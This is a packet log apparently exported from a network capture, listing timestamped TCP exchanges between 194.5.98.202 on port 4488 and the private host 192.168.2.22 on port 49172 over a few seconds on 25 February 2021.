Feb 25, 2021 07:31:19.601480007 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:19.601587057 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:19.731339931 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:19.731456995 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:19.936404943 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:19.937500000 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.046468973 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.046655893 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.261243105 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.261396885 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.361073017 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.361258984 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.362396002 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.362418890 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.362477064 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.363501072 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.364306927 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.364383936 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.365263939 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.366352081 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.366445065 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.368305922 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.368541002 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.368654013 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.370122910 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.371006012 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.371064901 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.596048117 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.596190929 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.627336979 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.628281116 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.628359079 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.629482985 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.630434990 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.630494118 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.632190943 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.633142948 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.633198023 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.634290934 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.635380030 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.635426998 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.635442972 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.636070967 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.636127949 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.637115002 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.638362885 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.638421059 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.639411926 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.640268087 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.640311956 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.640348911 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.642189026 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.642255068 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.643254995 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.644454002 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.644511938 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.645643950 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.645781994 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.645832062 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.897558928 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.897777081 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.899473906 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.899529934 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.899601936 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.901468039 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.901514053 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.901623964 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.903484106 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.904460907 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.904577971 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.905519009 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.905570030 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.905632973 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.907661915 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.907704115 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.907767057 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.908694029 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.908736944 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.908795118 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.909637928 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.910365105 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.910427094 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.912326097 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.912365913 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.912422895 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.913449049 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.915205002 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.915268898 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.915338993 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.916448116 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.916487932 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.916564941 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.917452097 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.917521000 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.918263912 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.918307066 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.918361902 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.920393944 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.920429945 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.920490980 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.921287060 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.922462940 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.922506094 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.922535896 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.923525095 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.923590899 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.925364017 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.925442934 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.925504923 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.927150011 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.928314924 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.928354979 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.928380013 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.928541899 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.928601980 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.929344893 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.931387901 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:20.931454897 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:20.932857990 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.161549091 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.161762953 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.162426949 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.167412043 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.167465925 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.167555094 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.169496059 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.169610023 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.169637918 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.170216084 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.170269012 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.170377970 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.172275066 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.172334909 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.173273087 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.173311949 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.173362017 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.174561977 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.176259041 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.176306963 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.176316977 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.176350117 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.176399946 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.178484917 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.179361105 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.179402113 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.179416895 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.181345940 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.181405067 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.181567907 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.182575941 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.182616949 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.182687044 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.184467077 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.184509039 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.184530020 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.185446978 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.185502052 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.187212944 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.188296080 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.188355923 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.189428091 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.189610958 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.189667940 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.190339088 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.191204071 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.191243887 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.191260099 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.194377899 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.194492102 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.195358038 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.196422100 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.196490049 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.196589947 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.197694063 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.197809935 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.198442936 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.199254036 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.199291945 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.199322939 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.201597929 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.201634884 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.201663971 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.201679945 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.201735020 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.203610897 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.203653097 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.203712940 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.205281973 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.314754963 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.683490038 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.684457064 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.684633970 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.685086966 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.686260939 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.686383963 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.687365055 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.688164949 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.688257933 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.688307047 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.689291954 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.689368010 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.690272093 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.691508055 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.691550016 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.691586018 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.692719936 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.692797899 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.693587065 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.693629026 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.693692923 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.694143057 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.697509050 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.697555065 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.697593927 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.699620962 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.699664116 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.699706078 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.700442076 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.700484991 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.700516939 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.701620102 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.701662064 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.701709032 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.703383923 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.703465939 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.704538107 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.705558062 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.705636024 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.706270933 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.707439899 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.707540989 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.708144903 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.709319115 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.709398985 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.710458994 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.710505009 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.710571051 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.711348057 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.712475061 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.712587118 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.713489056 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.714334965 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.714426994 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.715363979 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.716492891 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.716542006 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.716593027 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.718638897 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.718782902 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.719254971 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.720300913 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.720349073 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.720380068 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.724735975 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.724776030 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.724812984 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.724844933 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.724853039 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.724874020 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.725666046 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.725753069 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.726887941 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.727652073 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.727730989 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.728779078 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.729908943 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.729994059 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.730576038 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.900283098 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.952444077 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.952828884 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.953360081 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.953465939 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.953532934 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.957756042 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.958688021 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.958751917 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.959342003 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.959539890 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.959599972 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.961370945 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.961445093 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.961497068 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.963440895 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.963483095 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.963536978 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.967498064 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.968638897 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.968677998 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.968724012 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.970494986 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.970633984 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.971308947 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.971631050 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.972472906 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.973453045 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.973515987 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.974355936 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.974405050 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.974458933 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.975415945 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.976556063 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.976610899 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.977180004 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.978553057 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.978611946 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.979166985 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.979275942 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.979321957 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.980556965 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.982521057 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.982573032 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.983458996 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.983500004 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.983553886 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.985529900 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.986372948 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.986430883 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.987390995 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.988574028 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.988636971 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.988656044 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.988698959 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.988745928 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.990479946 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.990520954 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.990572929 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.991228104 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.993484020 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.993617058 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.994443893 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.995336056 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.995390892 CET	49172	4488	192.168.2.22	194.5.98.202
